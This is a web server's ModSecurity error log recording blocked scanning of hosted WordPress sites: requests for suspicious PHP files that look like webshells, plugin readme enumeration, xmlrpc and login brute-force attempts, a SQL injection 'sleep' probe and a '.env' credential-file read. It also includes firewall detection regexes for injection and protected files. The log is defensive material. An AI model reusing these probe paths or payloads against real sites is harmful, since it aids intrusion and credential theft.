[Tue May 26 12:52:53.868387 2026] [security2:error] [pid 461618:tid 461794] [client 145.239.10.137:46484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.10.239.145.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gldmarsa.com"] [uri "/Masks.php"] [unique_id "ahVKTVyiSlSCHr1fdr2mOAAAALM"], referer: http://gldmarsa.com/Masks.php
[Tue May 26 12:52:53.898403 2026] [security2:error] [pid 461618:tid 461842] [client 23.229.40.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKTVyiSlSCHr1fdr2mOQAAAOM"], referer: https://www.anujtradingco.com/
[Tue May 26 12:52:53.972741 2026] [security2:error] [pid 461618:tid 461765] [client 23.94.40.119:36372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKTVyiSlSCHr1fdr2mOgAAAJY"]
[Tue May 26 12:52:54.391480 2026] [security2:error] [pid 461618:tid 461761] [client 23.94.40.119:36378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKTlyiSlSCHr1fdr2mQQAAAJI"]
[Tue May 26 12:52:54.427975 2026] [security2:error] [pid 461618:tid 461770] [client 23.94.40.119:36394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKTlyiSlSCHr1fdr2mQgAAAJs"]
[Tue May 26 12:52:55.614333 2026] [security2:error] [pid 461618:tid 461818] [client 23.229.40.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKT1yiSlSCHr1fdr2mbAAAAMs"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1254338&moderation-hash=76dc8de983b031f0cd53f4ccc8681cef
[Tue May 26 12:52:55.657754 2026] [security2:error] [pid 461618:tid 461805] [client 23.94.40.119:36398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/uploads/hstmp/5SnmGV.php"] [unique_id "ahVKT1yiSlSCHr1fdr2mcQAAAL4"]
[Tue May 26 12:52:55.931705 2026] [security2:error] [pid 461618:tid 461788] [client 23.94.40.119:36486] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-comments-post.php"] [unique_id "ahVKT1yiSlSCHr1fdr2mdgAAAK0"]
[Tue May 26 12:52:55.931818 2026] [security2:error] [pid 461618:tid 461788] [client 23.94.40.119:36486] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-comments-post.php"] [unique_id "ahVKT1yiSlSCHr1fdr2mdgAAAK0"]
[Tue May 26 12:52:55.974194 2026] [security2:error] [pid 461618:tid 461768] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKT1yiSlSCHr1fdr2mbQAAAJk"]
[Tue May 26 12:52:56.144809 2026] [security2:error] [pid 461618:tid 461755] [client 23.94.40.119:36494] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKUFyiSlSCHr1fdr2mjwAAAIw"]
[Tue May 26 12:52:56.183098 2026] [security2:error] [pid 461618:tid 461869] [client 23.94.40.119:36488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKUFyiSlSCHr1fdr2mkAAAAP4"]
[Tue May 26 12:52:56.349671 2026] [security2:error] [pid 461618:tid 461844] [client 23.94.40.119:36498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/imagements/images/3efh8lluadlhqgrzgv9mubqzlvf.php"] [unique_id "ahVKUFyiSlSCHr1fdr2mlwAAAOU"]
[Tue May 26 12:52:56.438571 2026] [security2:error] [pid 461618:tid 461782] [client 23.94.40.119:36518] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/wp-statistics/readme.txt"] [unique_id "ahVKUFyiSlSCHr1fdr2mmwAAAKc"]
[Tue May 26 12:52:56.439384 2026] [security2:error] [pid 461618:tid 461817] [client 23.94.40.119:36534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKUFyiSlSCHr1fdr2mnAAAAMo"]
[Tue May 26 12:52:56.440142 2026] [security2:error] [pid 461618:tid 461841] [client 23.94.40.119:36512] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/cleantalk-spam-protect/readme.txt"] [unique_id "ahVKUFyiSlSCHr1fdr2mnQAAAOI"]
[Tue May 26 12:52:56.448959 2026] [security2:error] [pid 461618:tid 461753] [client 23.94.40.119:36536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/uploads/kaswara/fonts_icon/tyxmkk/yy.php"] [unique_id "ahVKUFyiSlSCHr1fdr2mngAAAIo"]
[Tue May 26 12:52:56.718162 2026] [security2:error] [pid 461618:tid 461861] [client 23.94.40.119:36552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKUFyiSlSCHr1fdr2mpAAAAPY"]
[Tue May 26 12:52:56.732841 2026] [security2:error] [pid 461618:tid 461798] [client 23.94.40.119:36550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin.php"] [unique_id "ahVKUFyiSlSCHr1fdr2mpQAAALc"]
[Tue May 26 12:52:56.746488 2026] [security2:error] [pid 461618:tid 461805] [client 23.94.40.119:36556] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKUFyiSlSCHr1fdr2mpgAAAL4"]
[Tue May 26 12:52:56.804866 2026] [security2:error] [pid 461618:tid 461783] [client 157.20.138.61:57040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKUFyiSlSCHr1fdr2mqAAAAKg"]
[Tue May 26 12:52:56.804976 2026] [security2:error] [pid 461618:tid 461783] [client 157.20.138.61:57040] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKUFyiSlSCHr1fdr2mqAAAAKg"]
[Tue May 26 12:52:56.873614 2026] [security2:error] [pid 461618:tid 461796] [client 23.94.40.119:36564] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/%7B%7Bpath%7D%7D/"] [unique_id "ahVKUFyiSlSCHr1fdr2mqQAAALU"]
[Tue May 26 12:52:57.002970 2026] [security2:error] [pid 461618:tid 461773] [client 23.94.40.119:36574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/uploads/workreap-temp/3EFh8QTs6TgZ421PYHDNLRUZ9LD.php"] [unique_id "ahVKUVyiSlSCHr1fdr2mtgAAAJ4"]
[Tue May 26 12:52:57.003567 2026] [security2:error] [pid 461618:tid 461835] [client 23.94.40.119:36588] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/pie-register/readme.txt"] [unique_id "ahVKUVyiSlSCHr1fdr2mtwAAANw"]
[Tue May 26 12:52:57.531471 2026] [security2:error] [pid 461618:tid 461777] [client 23.94.40.119:36604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/profile.php"] [unique_id "ahVKUVyiSlSCHr1fdr2myQAAAKI"]
[Tue May 26 12:52:58.146208 2026] [security2:error] [pid 461618:tid 461855] [client 23.94.40.119:35058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKUlyiSlSCHr1fdr2m3QAAAPA"]
[Tue May 26 12:52:58.178434 2026] [security2:error] [pid 461618:tid 461823] [client 23.94.40.119:35062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:procedure\\\\s+analyse\\\\s.{0,100}\\\\(|create\\\\s+(procedure|function)\\\\s.{0,100}\\\\w+\\\\s.{0,100}\\\\(\\\\s.{0,200}\\\\)\\\\s.{0,100}declare[^\\\\w]+[@#]\\\\s.{0,100}\\\\w+|exec\\\\s.{0,100}\\\\(\\\\s.{0,200}@|\\\\b(?:sleep|benchmark)\\\\b ?\\\\( ?[0-9])" at REQUEST_URI. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "273"] [id "380122"] [rev "5"] [msg "Atomicorp.com WAF Rules: MySQL and PostgreSQL stored procedure/function injections"] [data "sleep(6"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/forum/"] [unique_id "ahVKUlyiSlSCHr1fdr2m4QAAANA"]
[Tue May 26 12:52:58.244058 2026] [security2:error] [pid 461618:tid 461764] [client 23.94.40.119:35072] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/wc-multivendor-marketplace/readme.txt"] [unique_id "ahVKUlyiSlSCHr1fdr2m6AAAAJU"]
[Tue May 26 12:52:58.638088 2026] [autoindex:error] [pid 461618:tid 461872] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/home/announcement_pages/7
[Tue May 26 12:52:58.748742 2026] [security2:error] [pid 461618:tid 461847] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKUlyiSlSCHr1fdr2m7QAAAOg"]
[Tue May 26 12:52:58.922947 2026] [security2:error] [pid 461618:tid 461755] [client 23.94.40.119:35080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin.php"] [unique_id "ahVKUlyiSlSCHr1fdr2nAQAAAIw"]
[Tue May 26 12:52:59.531770 2026] [security2:error] [pid 461618:tid 461824] [client 119.93.249.179:54414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.249.93.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahVKU1yiSlSCHr1fdr2nEQAAANE"]
[Tue May 26 12:52:59.531881 2026] [security2:error] [pid 461618:tid 461824] [client 119.93.249.179:54414] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahVKU1yiSlSCHr1fdr2nEQAAANE"]
[Tue May 26 12:52:59.811544 2026] [security2:error] [pid 461618:tid 461697] [remote 42.194.184.145:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.184.194.42.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVKU1yiSlSCHr1fdr2nGwAAqE4"]
[Tue May 26 12:53:00.325540 2026] [security2:error] [pid 461618:tid 461806] [client 74.249.173.207:5076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVKVFyiSlSCHr1fdr2nKgAAAL8"]
[Tue May 26 12:53:00.630407 2026] [security2:error] [pid 461618:tid 461854] [client 27.189.130.224:48114] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahVKVFyiSlSCHr1fdr2nMQAAAO8"]
[Tue May 26 12:53:00.957509 2026] [security2:error] [pid 461618:tid 461795] [client 60.167.99.88:36802] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahVKVFyiSlSCHr1fdr2nRwAAALQ"]
[Tue May 26 12:53:01.078701 2026] [security2:error] [pid 461618:tid 461867] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVKVFyiSlSCHr1fdr2nQgAAAPw"]
[Tue May 26 12:53:02.097764 2026] [security2:error] [pid 461618:tid 461792] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKVVyiSlSCHr1fdr2nXAAAALE"]
[Tue May 26 12:53:02.413016 2026] [fcgid:warn] [pid 461618:tid 461875] (70014)End of file found: [client 27.189.130.224:55788] mod_fcgid: can't get data from http client
[Tue May 26 12:53:03.118228 2026] [core:error] [pid 461618:tid 461808] [client 64.188.91.103:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:53:03.118254 2026] [core:error] [pid 461618:tid 461808] [client 64.188.91.103:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:53:03.278047 2026] [security2:error] [pid 461618:tid 461687] [remote 64.188.91.103:63831] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "taotechservices.com"] [uri "/wp-content/plugins/fusion-builder/readme.txt"] [unique_id "ahVKV1yiSlSCHr1fdr2nnAAAl0Q"]
[Tue May 26 12:53:03.430126 2026] [security2:error] [pid 461618:tid 461809] [client 202.76.185.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKVlyiSlSCHr1fdr2njQAAAMI"]
[Tue May 26 12:53:03.515059 2026] [security2:error] [pid 461618:tid 461792] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVKV1yiSlSCHr1fdr2nogAAALE"]
[Tue May 26 12:53:03.960548 2026] [fcgid:warn] [pid 461618:tid 461799] (70014)End of file found: [client 27.189.130.224:55796] mod_fcgid: can't get data from http client
[Tue May 26 12:53:04.398972 2026] [security2:error] [pid 461618:tid 461841] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKV1yiSlSCHr1fdr2nvgAAAOI"]
[Tue May 26 12:53:05.651327 2026] [security2:error] [pid 461618:tid 461748] [client 74.249.173.207:5080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVKWVyiSlSCHr1fdr2oOwAAAIU"]
[Tue May 26 12:53:07.001688 2026] [security2:error] [pid 461618:tid 461770] [client 74.249.173.207:5073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahVKW1yiSlSCHr1fdr2oZAAAAJs"]
[Tue May 26 12:53:07.552648 2026] [security2:error] [pid 461618:tid 461787] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKW1yiSlSCHr1fdr2odwAAAKw"]
[Tue May 26 12:53:07.665242 2026] [security2:error] [pid 461618:tid 461790] [client 157.20.138.61:57412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKW1yiSlSCHr1fdr2oeAAAAK8"]
[Tue May 26 12:53:07.665493 2026] [security2:error] [pid 461618:tid 461790] [client 157.20.138.61:57412] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKW1yiSlSCHr1fdr2oeAAAAK8"]
[Tue May 26 12:53:07.809632 2026] [security2:error] [pid 461618:tid 461867] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKW1yiSlSCHr1fdr2ocQAAAPw"]
[Tue May 26 12:53:07.945236 2026] [security2:error] [pid 461618:tid 461701] [remote 31.13.127.117:38744] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKW1yiSlSCHr1fdr2ogwAA0FI"], referer: https://politica-global.com/?fbclid=IwZXh0bgNhZW0CMTEAc3J0YwZhcHBfaWQMMjU2MjgxMDQwNTU4AAEepHPJx2VdQIklDJ9Sn266Lk23OmuSiJ-K3iUwlzn3LYUBPhRrZQfE0Auay5k_aem_z8KWuI3ge8aKBI4Rokig5Q?fbclid=IwZXh0bgNhZW0CMTEAc3J0YwZhcHBfaWQMMjU2MjgxMDQwNTU4AAEepHPJx2VdQIklDJ9Sn266Lk23OmuSiJ-K3iUwlzn3LYUBPhRrZQfE0Auay5k_aem_z8KWuI3ge8aKBI4Rokig5Q
[Tue May 26 12:53:10.225493 2026] [security2:error] [pid 461618:tid 461861] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKXVyiSlSCHr1fdr2ovAAAAPY"]
[Tue May 26 12:53:10.648878 2026] [security2:error] [pid 461618:tid 461849] [client 195.178.110.34:52680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahVKXlyiSlSCHr1fdr2o3AAAAOo"]
[Tue May 26 12:53:12.819955 2026] [security2:error] [pid 461618:tid 461849] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKYFyiSlSCHr1fdr2pDwAAAOo"]
[Tue May 26 12:53:13.772886 2026] [security2:error] [pid 461618:tid 461740] [remote 132.148.72.88:55834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVKYVyiSlSCHr1fdr2pNAAA53k"]
[Tue May 26 12:53:14.163578 2026] [security2:error] [pid 461618:tid 461762] [client 74.249.173.207:5117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/function/function.php"] [unique_id "ahVKYlyiSlSCHr1fdr2pTQAAAJM"]
